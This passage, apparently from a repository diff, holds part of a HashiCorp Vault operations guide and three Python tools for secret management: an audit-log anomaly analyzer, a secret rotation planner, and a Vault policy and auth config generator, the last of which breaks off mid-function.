tenant_id = "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
vault_name = "vault-unseal-kv"
key_name = "vault-unseal-key"
}
```
### Auto-Unseal with GCP KMS
```hcl
seal "gcpckms" {
project = "my-project"
region = "global"
key_ring = "vault-keyring"
crypto_key = "vault-unseal-key"
}
```
## Namespaces (Enterprise)
Namespaces provide tenant isolation within a single Vault cluster. Each namespace has independent policies, auth methods, and secret engines.
```
root/
├── dev/ # Development environment
│ ├── auth/
│ └── secret/
├── staging/ # Staging environment
│ ├── auth/
│ └── secret/
└── production/ # Production environment
├── auth/
└── secret/
```
**OSS alternative:** Use path-based isolation with strict policies. Prefix all paths with environment name (e.g., `secret/data/production/...`).
## Policy Patterns
### Templated Policies
Use identity-based templates for scalable policy management:
```hcl
# Allow entities to manage their own secrets
path "secret/data/{{identity.entity.name}}/*" {
capabilities = ["create", "read", "update", "delete"]
}
# Read shared config for the entity's group
path "secret/data/shared/{{identity.groups.names}}/*" {
capabilities = ["read"]
}
```
### Sentinel Policies (Enterprise)
Enforce governance rules beyond path-based access:
```python
# Require MFA for production secret writes
import "mfa"
main = rule {
request.path matches "secret/data/production/.*" and
request.operation in ["create", "update", "delete"] and
mfa.methods.totp.valid
}
```
### Policy Hierarchy
1. **Global deny** — Explicit deny on `sys/*`, `auth/token/create-orphan`
2. **Environment base** — Read access to environment-specific paths
3. **Service-specific** — Scoped to exact paths the service needs
4. **Admin override** — Requires MFA, time-limited, audit-heavy
## Secret Engine Configuration
### KV v2 (Versioned Key-Value)
```bash
# Enable with custom config
vault secrets enable -path=secret -version=2 kv
# Configure version retention
vault write secret/config max_versions=10 cas_required=true delete_version_after=90d
```
**Check-and-Set (CAS):** Prevents accidental overwrites. Client must supply the current version number to update.
### Database Engine
```bash
# Enable and configure PostgreSQL
vault secrets enable database
vault write database/config/postgres \
plugin_name=postgresql-database-plugin \
connection_url="postgresql://{{username}}:{{password}}@db.internal:5432/app?sslmode=require" \
allowed_roles="app-readonly,app-readwrite" \
username="vault_admin" \
password="INITIAL_PASSWORD"
# Rotate the root password (Vault manages it from now on)
vault write -f database/rotate-root/postgres
# Create a read-only role
vault write database/roles/app-readonly \
db_name=postgres \
creation_statements="CREATE ROLE \"{{name}}\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; GRANT SELECT ON ALL TABLES IN SCHEMA public TO \"{{name}}\";" \
revocation_statements="DROP ROLE IF EXISTS \"{{name}}\";" \
default_ttl=1h \
max_ttl=24h
```
### PKI Engine (Certificate Authority)
```bash
# Enable PKI engine
vault secrets enable -path=pki pki
vault secrets tune -max-lease-ttl=87600h pki
# Generate root CA
vault write -field=certificate pki/root/generate/internal \
common_name="Example Root CA" \
ttl=87600h > root_ca.crt
# Enable intermediate CA
vault secrets enable -path=pki_int pki
vault secrets tune -max-lease-ttl=43800h pki_int
# Generate intermediate CSR
vault write -field=csr pki_int/intermediate/generate/internal \
common_name="Example Intermediate CA" > intermediate.csr
# Sign with root CA
vault write -field=certificate pki/root/sign-intermediate \
csr=@intermediate.csr format=pem_bundle ttl=43800h > intermediate.crt
# Set signed certificate
vault write pki_int/intermediate/set-signed certificate=@intermediate.crt
# Create role for leaf certificates
vault write pki_int/roles/web-server \
allowed_domains="example.com" \
allow_subdomains=true \
max_ttl=2160h
```
### Transit Engine (Encryption-as-a-Service)
```bash
vault secrets enable transit
# Create encryption key
vault write -f transit/keys/payment-data \
type=aes256-gcm96
# Encrypt data
vault write transit/encrypt/payment-data \
plaintext=$(echo "sensitive-data" | base64)
# Decrypt data
vault write transit/decrypt/payment-data \
ciphertext="vault:v1:..."
# Rotate key (old versions still decrypt, new encrypts with latest)
vault write -f transit/keys/payment-data/rotate
# Rewrap ciphertext to latest key version
vault write transit/rewrap/payment-data \
ciphertext="vault:v1:..."
```
## Performance and Scaling
### Performance Replication (Enterprise)
Primary cluster replicates to secondary clusters in other regions. Secondaries handle read traffic locally.
### Performance Standbys (Enterprise)
Standby nodes serve read requests without forwarding to the leader, reducing leader load.
### Response Wrapping
Wrap sensitive responses in a single-use token — the recipient unwraps exactly once:
```bash
# Wrap a secret (TTL = 5 minutes)
vault kv get -wrap-ttl=5m secret/data/production/db-creds
# Recipient unwraps
vault unwrap <wrapping_token>
```
### Batch Tokens
For high-throughput workloads (Lambda, serverless), use batch tokens instead of service tokens. Batch tokens are not persisted to storage, reducing I/O.
## Monitoring and Health
### Key Metrics
| Metric | Alert Threshold | Source |
|--------|----------------|--------|
| `vault.core.unsealed` | 0 (sealed) | Telemetry |
| `vault.expire.num_leases` | >10,000 | Telemetry |
| `vault.audit.log_response` | Error rate >1% | Telemetry |
| `vault.runtime.alloc_bytes` | >80% memory | Telemetry |
| `vault.raft.leader.lastContact` | >500ms | Telemetry |
| `vault.token.count` | >50,000 | Telemetry |
### Health Check Endpoint
```bash
# Returns 200 if initialized, unsealed, and active
curl -s https://vault.internal:8200/v1/sys/health
# Status codes:
# 200 — initialized, unsealed, active
# 429 — unsealed, standby
# 472 — disaster recovery secondary
# 473 — performance standby
# 501 — not initialized
# 503 — sealed
```
## Disaster Recovery
### Backup
```bash
# Raft snapshot (includes all data)
vault operator raft snapshot save backup-$(date +%Y%m%d).snap
# Schedule daily backups via cron
0 2 * * * /usr/local/bin/vault operator raft snapshot save /backups/vault-$(date +\%Y\%m\%d).snap
```
### Restore
```bash
# Restore from snapshot (causes brief outage)
vault operator raft snapshot restore backup-20260320.snap
```
### DR Replication (Enterprise)
Secondary cluster in standby. Promote on primary failure:
```bash
# On DR secondary
vault operator generate-root -dr-token
vault write sys/replication/dr/secondary/promote dr_operation_token=<token>
```

View File

@@ -0,0 +1,330 @@
#!/usr/bin/env python3
"""Analyze Vault or cloud secret manager audit logs for anomalies.
Reads JSON-lines or JSON-array audit log files and flags unusual access
patterns including volume spikes, off-hours access, new source IPs,
and failed authentication attempts.
Usage:
python audit_log_analyzer.py --log-file vault-audit.log --threshold 5
python audit_log_analyzer.py --log-file audit.json --threshold 3 --json
Expected log entry format (JSON lines or JSON array):
{
"timestamp": "2026-03-20T14:32:00Z",
"type": "request",
"auth": {"accessor": "token-abc123", "entity_id": "eid-001", "display_name": "approle-payment-svc"},
"request": {"path": "secret/data/production/payment/api-keys", "operation": "read"},
"response": {"status_code": 200},
"remote_address": "10.0.1.15"
}
Fields are optional — the analyzer works with whatever is available.
"""
import argparse
import json
import sys
import textwrap
from collections import defaultdict
from datetime import datetime
def load_logs(path):
    """Read audit log entries from *path*.

    Accepts either a single top-level JSON array or newline-delimited JSON
    objects. Exits with status 1 when the file does not exist. Malformed
    lines are skipped with a warning on stderr; an empty file yields [].
    """
    try:
        with open(path, "r") as handle:
            raw = handle.read().strip()
    except FileNotFoundError:
        print(f"ERROR: Log file not found: {path}", file=sys.stderr)
        sys.exit(1)

    if not raw:
        return []

    # A leading '[' suggests a JSON array — attempt that interpretation first.
    if raw.startswith("["):
        try:
            return json.loads(raw)
        except json.JSONDecodeError:
            pass  # fall back to line-by-line parsing below

    # JSON-lines: one object per non-blank line.
    records = []
    for lineno, raw_line in enumerate(raw.split("\n"), 1):
        candidate = raw_line.strip()
        if not candidate:
            continue
        try:
            records.append(json.loads(candidate))
        except json.JSONDecodeError:
            print(f"WARNING: Skipping malformed line {lineno}", file=sys.stderr)
    return records
def extract_fields(entry):
    """Extract normalized fields from a log entry.

    Args:
        entry: One raw audit log dict (Vault-style or flattened); all
            fields are optional.

    Returns:
        Dict with keys: ``timestamp`` (datetime or None), ``hour``,
        ``identity``, ``path``, ``operation``, ``status_code``,
        ``remote_address``, ``entry_type``. Missing source fields degrade
        to "unknown"/None rather than raising.
    """
    timestamp_raw = entry.get("timestamp", entry.get("time", ""))
    ts = None
    if timestamp_raw:
        # datetime.fromisoformat covers all the formats this tool expects
        # ("T" or space separator, optional fractional seconds, optional
        # UTC offset) once a trailing "Z" is normalized to "+00:00".
        # The previous strptime loop built an unmatchable format string
        # ("...%zZ") for offset timestamps and then stripped the offset it
        # had just added in the fallback — this is the simplified fix.
        try:
            ts = datetime.fromisoformat(str(timestamp_raw).replace("Z", "+00:00"))
        except (ValueError, TypeError):
            ts = None
    auth = entry.get("auth", {})
    request = entry.get("request", {})
    response = entry.get("response", {})
    return {
        "timestamp": ts,
        "hour": ts.hour if ts else None,
        "identity": auth.get("display_name", auth.get("entity_id", "unknown")),
        "path": request.get("path", entry.get("path", "unknown")),
        "operation": request.get("operation", entry.get("operation", "unknown")),
        "status_code": response.get("status_code", entry.get("status_code")),
        "remote_address": entry.get("remote_address", entry.get("source_address", "unknown")),
        "entry_type": entry.get("type", "unknown"),
    }
def analyze(entries, threshold):
    """Run anomaly detection across all log entries.

    Args:
        entries: Raw audit log dicts as returned by load_logs().
        threshold: Sensitivity knob — lower values flag more anomalies.

    Returns:
        Dict with "summary" (counts), "anomalies" (sorted most-severe
        first), "top_accessed_paths" (top 10), and "hourly_distribution".
    """
    parsed = [extract_fields(e) for e in entries]
    # Counters
    access_by_identity = defaultdict(int)
    access_by_path = defaultdict(int)
    access_by_ip = defaultdict(set)  # identity -> set of IPs
    ip_to_identities = defaultdict(set)  # IP -> set of identities
    failed_by_source = defaultdict(int)  # "identity@ip" -> failure count
    off_hours_access = []
    path_by_identity = defaultdict(set)  # identity -> set of paths
    hourly_distribution = defaultdict(int)
    for p in parsed:
        identity = p["identity"]
        path = p["path"]
        ip = p["remote_address"]
        status = p["status_code"]
        hour = p["hour"]
        access_by_identity[identity] += 1
        access_by_path[path] += 1
        access_by_ip[identity].add(ip)
        ip_to_identities[ip].add(identity)
        path_by_identity[identity].add(path)
        if hour is not None:
            hourly_distribution[hour] += 1
        # Failed access (4xx/5xx, or explicit 0 status). BUGFIX: compare
        # against None instead of truthiness — a status of 0 is falsy, so
        # the old `if status and (... or status == 0)` could never count it.
        if status is not None and (status >= 400 or status == 0):
            failed_by_source[f"{identity}@{ip}"] += 1
        # Off-hours: before 6 AM or after 10 PM
        if hour is not None and (hour < 6 or hour >= 22):
            off_hours_access.append(p)
    # Build anomalies
    anomalies = []
    # 1. Volume spikes — identities accessing secrets more than threshold * average
    if access_by_identity:
        avg_access = sum(access_by_identity.values()) / len(access_by_identity)
        spike_threshold = max(threshold * avg_access, threshold)
        for identity, count in access_by_identity.items():
            if count >= spike_threshold:
                anomalies.append({
                    "type": "volume_spike",
                    "severity": "HIGH",
                    "identity": identity,
                    "access_count": count,
                    "threshold": round(spike_threshold, 1),
                    "description": f"Identity '{identity}' made {count} accesses (threshold: {round(spike_threshold, 1)})",
                })
    # 2. Multi-IP access — single identity from many IPs
    for identity, ips in access_by_ip.items():
        if len(ips) >= threshold:
            anomalies.append({
                "type": "multi_ip_access",
                "severity": "MEDIUM",
                "identity": identity,
                "ip_count": len(ips),
                "ips": sorted(ips),
                "description": f"Identity '{identity}' accessed from {len(ips)} different IPs",
            })
    # 3. Failed access attempts
    for source, count in failed_by_source.items():
        if count >= threshold:
            anomalies.append({
                "type": "failed_access",
                "severity": "HIGH",
                "source": source,
                "failure_count": count,
                "description": f"Source '{source}' had {count} failed access attempts",
            })
    # 4. Off-hours access (floor of 2 so a single stray event never alerts)
    if off_hours_access:
        off_hours_identities = defaultdict(int)
        for p in off_hours_access:
            off_hours_identities[p["identity"]] += 1
        for identity, count in off_hours_identities.items():
            if count >= max(threshold, 2):
                anomalies.append({
                    "type": "off_hours_access",
                    "severity": "MEDIUM",
                    "identity": identity,
                    "access_count": count,
                    "description": f"Identity '{identity}' made {count} accesses outside business hours (before 6 AM / after 10 PM)",
                })
    # 5. Broad path access — single identity touching many paths
    for identity, paths in path_by_identity.items():
        if len(paths) >= threshold * 2:
            anomalies.append({
                "type": "broad_access",
                "severity": "MEDIUM",
                "identity": identity,
                "path_count": len(paths),
                "paths": sorted(paths)[:10],  # cap the listing at 10 paths
                "description": f"Identity '{identity}' accessed {len(paths)} distinct secret paths",
            })
    # Sort anomalies by severity (stable sort preserves order within a tier)
    severity_order = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3}
    anomalies.sort(key=lambda x: severity_order.get(x["severity"], 4))
    # Summary stats
    summary = {
        "total_entries": len(entries),
        "parsed_entries": len(parsed),
        "unique_identities": len(access_by_identity),
        "unique_paths": len(access_by_path),
        "unique_source_ips": len(ip_to_identities),
        "total_failures": sum(failed_by_source.values()),
        "off_hours_events": len(off_hours_access),
        "anomalies_found": len(anomalies),
    }
    # Top accessed paths
    top_paths = sorted(access_by_path.items(), key=lambda x: -x[1])[:10]
    return {
        "summary": summary,
        "anomalies": anomalies,
        "top_accessed_paths": [{"path": p, "count": c} for p, c in top_paths],
        "hourly_distribution": dict(sorted(hourly_distribution.items())),
    }
def print_human(result, threshold):
    """Print human-readable analysis report.

    Writes the summary block, each detected anomaly, the top accessed
    paths, and an hour-of-day histogram to stdout. Rows outside business
    hours (before 6 AM / after 10 PM) are marked with '*'.
    """
    summary = result["summary"]
    anomalies = result["anomalies"]
    print("=== Audit Log Analysis Report ===")
    print(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M')}")
    print(f"Anomaly threshold: {threshold}")
    print()
    print("--- Summary ---")
    print(f"  Total log entries: {summary['total_entries']}")
    print(f"  Unique identities: {summary['unique_identities']}")
    print(f"  Unique secret paths: {summary['unique_paths']}")
    print(f"  Unique source IPs: {summary['unique_source_ips']}")
    print(f"  Total failures: {summary['total_failures']}")
    print(f"  Off-hours events: {summary['off_hours_events']}")
    print(f"  Anomalies detected: {summary['anomalies_found']}")
    print()
    if anomalies:
        print("--- Anomalies ---")
        for i, a in enumerate(anomalies, 1):
            print(f"  [{a['severity']}] {a['type']}: {a['description']}")
        print()
    else:
        print("--- No anomalies detected ---")
        print()
    if result["top_accessed_paths"]:
        print("--- Top Accessed Paths ---")
        for item in result["top_accessed_paths"]:
            print(f"  {item['count']:5d}  {item['path']}")
        print()
    if result["hourly_distribution"]:
        print("--- Hourly Distribution ---")
        # Scale bars so the busiest hour renders as a full 40-char bar.
        max_count = max(result["hourly_distribution"].values()) if result["hourly_distribution"] else 1
        for hour in range(24):
            count = result["hourly_distribution"].get(hour, 0)
            bar_len = int((count / max_count) * 40) if max_count > 0 else 0
            marker = " *" if (hour < 6 or hour >= 22) else ""
            print(f"  {hour:02d}:00 {'#' * bar_len:40s} {count}{marker}")
        print("  (* = off-hours)")
def main():
    """Parse CLI arguments, load the audit log, analyze it, and report.

    Exits with status 1 (via load_logs or directly) when the log file is
    missing or contains no entries.
    """
    parser = argparse.ArgumentParser(
        description="Analyze Vault/cloud secret manager audit logs for anomalies.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent("""\
            The analyzer detects:
            - Volume spikes (identity accessing secrets above threshold * average)
            - Multi-IP access (single identity from many source IPs)
            - Failed access attempts (repeated auth/access failures)
            - Off-hours access (before 6 AM or after 10 PM)
            - Broad path access (single identity accessing many distinct paths)
            Log format: JSON lines or JSON array. Each entry should include
            timestamp, auth info, request path/operation, response status,
            and remote address. Missing fields are handled gracefully.
            Examples:
              %(prog)s --log-file vault-audit.log --threshold 5
              %(prog)s --log-file audit.json --threshold 3 --json
        """),
    )
    parser.add_argument("--log-file", required=True, help="Path to audit log file (JSON lines or JSON array)")
    parser.add_argument(
        "--threshold",
        type=int,
        default=5,
        help="Anomaly sensitivity threshold — lower = more sensitive (default: 5)",
    )
    parser.add_argument("--json", action="store_true", dest="json_output", help="Output as JSON")
    args = parser.parse_args()
    entries = load_logs(args.log_file)
    if not entries:
        print("No log entries found in file.", file=sys.stderr)
        sys.exit(1)
    result = analyze(entries, args.threshold)
    # Attach run metadata so JSON output is self-describing.
    result["log_file"] = args.log_file
    result["threshold"] = args.threshold
    result["analyzed_at"] = datetime.now().isoformat()
    if args.json_output:
        print(json.dumps(result, indent=2))
    else:
        print_human(result, args.threshold)


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,280 @@
#!/usr/bin/env python3
"""Create a rotation schedule from a secret inventory file.
Reads a JSON inventory of secrets and produces a rotation plan based on
the selected policy (30d, 60d, 90d) with urgency classification.
Usage:
python rotation_planner.py --inventory secrets.json --policy 30d
python rotation_planner.py --inventory secrets.json --policy 90d --json
Inventory file format (JSON):
[
{
"name": "prod-db-password",
"type": "database",
"store": "vault",
"last_rotated": "2026-01-15",
"owner": "platform-team",
"environment": "production"
},
...
]
"""
import argparse
import json
import sys
import textwrap
from datetime import datetime, timedelta
# Rotation interval (days) implied by each CLI --policy choice. The policy
# acts as a cap: the effective interval is min(policy, type default).
POLICY_DAYS = {
    "30d": 30,
    "60d": 60,
    "90d": 90,
}
# Default rotation period by secret type if not overridden by policy
TYPE_DEFAULTS = {
    "database": 30,
    "api-key": 90,
    "tls-certificate": 60,
    "ssh-key": 90,
    "service-token": 1,
    "encryption-key": 90,
    "oauth-secret": 90,
    "password": 30,
}
# Days-until-due cutoffs used to classify each secret's rotation urgency.
URGENCY_THRESHOLDS = {
    "critical": 0,  # Already overdue
    "high": 7,  # Due within 7 days
    "medium": 14,  # Due within 14 days
    "low": 30,  # Due within 30 days
}
def load_inventory(path):
    """Read a JSON secret inventory and normalize each entry.

    Exits with status 1 on a missing file, malformed JSON, or a top-level
    value that is not an array. Entries that are not objects are skipped
    with a warning; a missing or unparseable ``last_rotated`` date becomes
    ``None`` so downstream scheduling treats the secret as overdue.

    Returns a list of dicts with keys: name, type, store, last_rotated
    (datetime or None), owner, environment.
    """
    try:
        with open(path, "r") as handle:
            raw = json.load(handle)
    except FileNotFoundError:
        print(f"ERROR: Inventory file not found: {path}", file=sys.stderr)
        sys.exit(1)
    except json.JSONDecodeError as e:
        print(f"ERROR: Invalid JSON in {path}: {e}", file=sys.stderr)
        sys.exit(1)
    if not isinstance(raw, list):
        print("ERROR: Inventory must be a JSON array of secret objects", file=sys.stderr)
        sys.exit(1)
    normalized = []
    for idx, item in enumerate(raw):
        if not isinstance(item, dict):
            print(f"WARNING: Skipping entry {idx} — not an object", file=sys.stderr)
            continue
        name = item.get("name", f"unnamed-{idx}")
        raw_date = item.get("last_rotated")
        parsed_date = None
        if not raw_date:
            print(f"WARNING: '{name}' has no last_rotated date — marking as overdue", file=sys.stderr)
        else:
            try:
                parsed_date = datetime.strptime(raw_date, "%Y-%m-%d")
            except ValueError:
                print(f"WARNING: '{name}' has invalid date '{raw_date}' — marking as overdue", file=sys.stderr)
        normalized.append({
            "name": name,
            "type": item.get("type", "unknown"),
            "store": item.get("store", "unknown"),
            "last_rotated": parsed_date,
            "owner": item.get("owner", "unassigned"),
            "environment": item.get("environment", "unknown"),
        })
    return normalized
def compute_schedule(inventory, policy_days):
    """Build one rotation row per secret, sorted by urgency then due date.

    The effective interval is the tighter of the policy maximum and the
    per-type default from TYPE_DEFAULTS (unknown types fall back to 90).
    Secrets with no parseable last-rotated date are forced to CRITICAL
    via sentinel values (999 days since / -999 days until due).
    """
    now = datetime.now()
    rows = []
    for item in inventory:
        interval = min(policy_days, TYPE_DEFAULTS.get(item["type"], 90))
        rotated = item["last_rotated"]
        if rotated is None:
            # Never rotated (or bad date): due immediately.
            days_since, due_at, days_until = 999, now, -999
        else:
            days_since = (now - rotated).days
            due_at = rotated + timedelta(days=interval)
            days_until = (due_at - now).days
        # First bucket whose threshold the secret does not exceed wins.
        for level, limit in (("CRITICAL", URGENCY_THRESHOLDS["critical"]),
                             ("HIGH", URGENCY_THRESHOLDS["high"]),
                             ("MEDIUM", URGENCY_THRESHOLDS["medium"])):
            if days_until <= limit:
                urgency = level
                break
        else:
            urgency = "LOW"
        rows.append({
            "name": item["name"],
            "type": item["type"],
            "store": item["store"],
            "owner": item["owner"],
            "environment": item["environment"],
            "last_rotated": rotated.strftime("%Y-%m-%d") if rotated else "NEVER",
            "rotation_interval_days": interval,
            "next_rotation": due_at.strftime("%Y-%m-%d"),
            "days_until_due": days_until,
            "days_since_rotation": days_since,
            "urgency": urgency,
        })
    # Most urgent first; ties broken by how soon the secret is due.
    rank = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3}
    rows.sort(key=lambda r: (rank.get(r["urgency"], 4), r["days_until_due"]))
    return rows
def build_summary(schedule):
    """Aggregate schedule rows into counts by urgency, type, and owner.

    Also surfaces two convenience totals: overdue_count (CRITICAL rows)
    and due_within_7d (HIGH rows).
    """
    by_urgency = {}
    by_type = {}
    by_owner = {}
    for row in schedule:
        for bucket, key in ((by_urgency, "urgency"),
                            (by_type, "type"),
                            (by_owner, "owner")):
            value = row[key]
            bucket[value] = bucket.get(value, 0) + 1
    return {
        "total_secrets": len(schedule),
        "by_urgency": by_urgency,
        "by_type": by_type,
        "by_owner": by_owner,
        "overdue_count": by_urgency.get("CRITICAL", 0),
        "due_within_7d": by_urgency.get("HIGH", 0),
    }
def print_human(schedule, summary, policy):
    """Render the rotation plan as a plain-text report on stdout."""
    for line in (
        f"=== Secret Rotation Plan (Policy: {policy}) ===",
        f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M')}",
        f"Total secrets: {summary['total_secrets']}",
        "",
        "--- Urgency Summary ---",
    ):
        print(line)
    for level in ("CRITICAL", "HIGH", "MEDIUM", "LOW"):
        n = summary["by_urgency"].get(level, 0)
        if n > 0:
            print(f" {level:10s} {n}")
    print()
    if not schedule:
        print("No secrets in inventory.")
        return
    print("--- Rotation Schedule ---")
    print(f" {'Name':30s} {'Type':15s} {'Urgency':10s} {'Last Rotated':12s} {'Next Due':12s} {'Owner'}")
    print(f" {'-'*30} {'-'*15} {'-'*10} {'-'*12} {'-'*12} {'-'*15}")
    for row in schedule:
        suffix = " **OVERDUE**" if row["urgency"] == "CRITICAL" else ""
        print(
            f" {row['name']:30s} {row['type']:15s} {row['urgency']:10s} "
            f"{row['last_rotated']:12s} {row['next_rotation']:12s} "
            f"{row['owner']}{suffix}"
        )
    print()
    print("--- Action Items ---")
    overdue = [r for r in schedule if r["urgency"] == "CRITICAL"]
    due_soon = [r for r in schedule if r["urgency"] == "HIGH"]
    if overdue:
        print(f" IMMEDIATE: Rotate {len(overdue)} overdue secret(s):")
        for r in overdue:
            print(f" - {r['name']} ({r['type']}, owner: {r['owner']})")
    if due_soon:
        print(f" THIS WEEK: Rotate {len(due_soon)} secret(s) due within 7 days:")
        for r in due_soon:
            print(f" - {r['name']} (due: {r['next_rotation']}, owner: {r['owner']})")
    if not overdue and not due_soon:
        print(" No urgent rotations needed.")
def main():
    """CLI entry point: load inventory, compute the plan, print or dump JSON."""
    epilog = textwrap.dedent("""\
        Policies:
        30d Aggressive — all secrets rotate within 30 days max
        60d Standard — 60-day maximum rotation window
        90d Relaxed — 90-day maximum rotation window
        Note: Some secret types (e.g., database passwords) have shorter
        built-in defaults that override the policy maximum.
        Example inventory file (secrets.json):
        [
        {"name": "prod-db", "type": "database", "store": "vault",
        "last_rotated": "2026-01-15", "owner": "platform-team",
        "environment": "production"}
        ]
        """)
    parser = argparse.ArgumentParser(
        description="Create rotation schedule from a secret inventory file.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=epilog,
    )
    parser.add_argument("--inventory", required=True, help="Path to JSON inventory file")
    parser.add_argument(
        "--policy",
        required=True,
        choices=["30d", "60d", "90d"],
        help="Rotation policy (maximum rotation interval)",
    )
    parser.add_argument("--json", action="store_true", dest="json_output", help="Output as JSON")
    args = parser.parse_args()
    policy_days = POLICY_DAYS[args.policy]
    schedule = compute_schedule(load_inventory(args.inventory), policy_days)
    summary = build_summary(schedule)
    if args.json_output:
        print(json.dumps({
            "policy": args.policy,
            "policy_days": policy_days,
            "generated_at": datetime.now().isoformat(),
            "summary": summary,
            "schedule": schedule,
        }, indent=2))
    else:
        print_human(schedule, summary, args.policy)


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,302 @@
#!/usr/bin/env python3
"""Generate Vault policy and auth configuration from application requirements.
Produces HCL policy files and auth method setup commands for HashiCorp Vault
based on application name, auth method, and required secret paths.
Usage:
python vault_config_generator.py --app-name payment-service --auth-method approle --secrets "db-creds,api-key,tls-cert"
python vault_config_generator.py --app-name api-gateway --auth-method kubernetes --secrets "db-creds" --namespace production --json
"""
import argparse
import json
import sys
import textwrap
from datetime import datetime
# Default TTLs by auth method
# (looked up in generate_auth_config; methods absent here fall back to {}).
AUTH_METHOD_DEFAULTS = {
    "approle": {
        "token_ttl": "1h",
        "token_max_ttl": "4h",
        "secret_id_num_uses": 1,  # single-use SecretIDs
        "secret_id_ttl": "10m",
    },
    "kubernetes": {
        "token_ttl": "1h",
        "token_max_ttl": "4h",
    },
    "oidc": {
        "token_ttl": "8h",
        "token_max_ttl": "12h",
    },
}
# Secret type templates
# Maps each user-facing secret type (the --secrets tokens) to the Vault
# engine, a policy path template ({app}/{env} filled in later via .format),
# and the capabilities the generated policy grants on that path.
SECRET_TYPE_MAP = {
    "db-creds": {
        "engine": "database",
        "path": "database/creds/{app}-readonly",
        "capabilities": ["read"],
        "description": "Dynamic database credentials",
    },
    "db-admin": {
        "engine": "database",
        "path": "database/creds/{app}-readwrite",
        "capabilities": ["read"],
        "description": "Dynamic database admin credentials",
    },
    "api-key": {
        "engine": "kv-v2",
        "path": "secret/data/{env}/{app}/api-keys",
        "capabilities": ["read"],
        "description": "Static API keys (KV v2)",
    },
    "tls-cert": {
        "engine": "pki",
        "path": "pki/issue/{app}-cert",
        "capabilities": ["create", "update"],
        "description": "TLS certificate issuance",
    },
    "encryption": {
        "engine": "transit",
        "path": "transit/encrypt/{app}-key",
        "capabilities": ["update"],
        "description": "Transit encryption operations",
    },
    "ssh-cert": {
        "engine": "ssh",
        "path": "ssh/sign/{app}-role",
        "capabilities": ["create", "update"],
        "description": "SSH certificate signing",
    },
    "config": {
        "engine": "kv-v2",
        "path": "secret/data/{env}/{app}/config",
        "capabilities": ["read"],
        "description": "Application configuration secrets",
    },
}
def parse_secrets(secrets_str):
    """Split a comma-separated type list into (known, unknown) type names.

    Whitespace around each token is stripped and empty tokens are dropped.
    Known types are those present in SECRET_TYPE_MAP; everything else goes
    into the unknown list for warning output.
    """
    known, unknown = [], []
    for token in secrets_str.split(","):
        token = token.strip()
        if not token:
            continue
        (known if token in SECRET_TYPE_MAP else unknown).append(token)
    return known, unknown
def generate_policy_hcl(app_name, secrets, environment="production"):
    """Render an HCL policy document granting each requested secret path.

    Each secret type contributes one commented `path` stanza; a blanket
    deny on ``sys/*`` is always appended so the app token cannot reach
    admin endpoints.
    """
    out = [
        f'# Vault policy for {app_name}',
        f'# Generated: {datetime.now().strftime("%Y-%m-%d %H:%M:%S")}',
        f'# Environment: {environment}',
        '',
    ]
    for kind in secrets:
        spec = SECRET_TYPE_MAP[kind]
        caps = ", ".join(f'"{c}"' for c in spec["capabilities"])
        out.extend([
            f'# {spec["description"]}',
            f'path "{spec["path"].format(app=app_name, env=environment)}" {{',
            f' capabilities = [{caps}]',
            '}',
            '',
        ])
    # Always deny admin paths, regardless of the requested secret types.
    out.extend([
        '# Deny admin paths',
        'path "sys/*" {',
        ' capabilities = ["deny"]',
        '}',
    ])
    return "\n".join(out)
def generate_auth_config(app_name, auth_method, policy_name, namespace=None):
    """Produce the `vault` CLI commands that wire up the chosen auth method.

    Returns a list of {"description", "command"} dicts. TTLs come from
    AUTH_METHOD_DEFAULTS; an unrecognized auth_method yields an empty list.
    The namespace argument is only used by the kubernetes method
    (defaults to "default").
    """
    ttls = AUTH_METHOD_DEFAULTS.get(auth_method, {})
    steps = []
    if auth_method == "approle":
        create = (
            f"vault write auth/approle/role/{app_name} \\\n"
            f" token_ttl={ttls['token_ttl']} \\\n"
            f" token_max_ttl={ttls['token_max_ttl']} \\\n"
            f" secret_id_num_uses={ttls['secret_id_num_uses']} \\\n"
            f" secret_id_ttl={ttls['secret_id_ttl']} \\\n"
            f" token_policies=\"{policy_name}\""
        )
        steps = [
            {"description": f"Create AppRole for {app_name}", "command": create},
            {"description": "Fetch RoleID",
             "command": f"vault read auth/approle/role/{app_name}/role-id"},
            {"description": "Generate SecretID (single-use)",
             "command": f"vault write -f auth/approle/role/{app_name}/secret-id"},
        ]
    elif auth_method == "kubernetes":
        bound_ns = namespace or "default"
        create = (
            f"vault write auth/kubernetes/role/{app_name} \\\n"
            f" bound_service_account_names={app_name} \\\n"
            f" bound_service_account_namespaces={bound_ns} \\\n"
            f" policies={policy_name} \\\n"
            f" ttl={ttls['token_ttl']}"
        )
        steps = [{"description": f"Create Kubernetes auth role for {app_name}", "command": create}]
    elif auth_method == "oidc":
        create = (
            f"vault write auth/oidc/role/{app_name} \\\n"
            f" bound_audiences=\"vault\" \\\n"
            f" allowed_redirect_uris=\"https://vault.example.com/ui/vault/auth/oidc/oidc/callback\" \\\n"
            f" user_claim=\"email\" \\\n"
            f" oidc_scopes=\"openid,profile,email\" \\\n"
            f" policies=\"{policy_name}\" \\\n"
            f" ttl={ttls['token_ttl']}"
        )
        steps = [{"description": f"Create OIDC role for {app_name}", "command": create}]
    return steps
def build_output(app_name, auth_method, secrets, environment, namespace):
    """Assemble the full configuration payload (policy HCL, commands, paths).

    Returns an error payload (with "error", "unknown", "available_types")
    when no valid secret type was requested; otherwise the complete result
    dict, with optional "warnings" (for skipped unknown types) and
    "namespace" keys.
    """
    valid, unknown = parse_secrets(secrets)
    if not valid:
        return {
            "error": "No valid secret types provided",
            "unknown": unknown,
            "available_types": list(SECRET_TYPE_MAP.keys()),
        }
    policy_name = f"{app_name}-policy"
    details = []
    for kind in valid:
        spec = SECRET_TYPE_MAP[kind]
        details.append({
            "type": kind,
            "engine": spec["engine"],
            "path": spec["path"].format(app=app_name, env=environment),
            "capabilities": spec["capabilities"],
            "description": spec["description"],
        })
    result = {
        "app_name": app_name,
        "auth_method": auth_method,
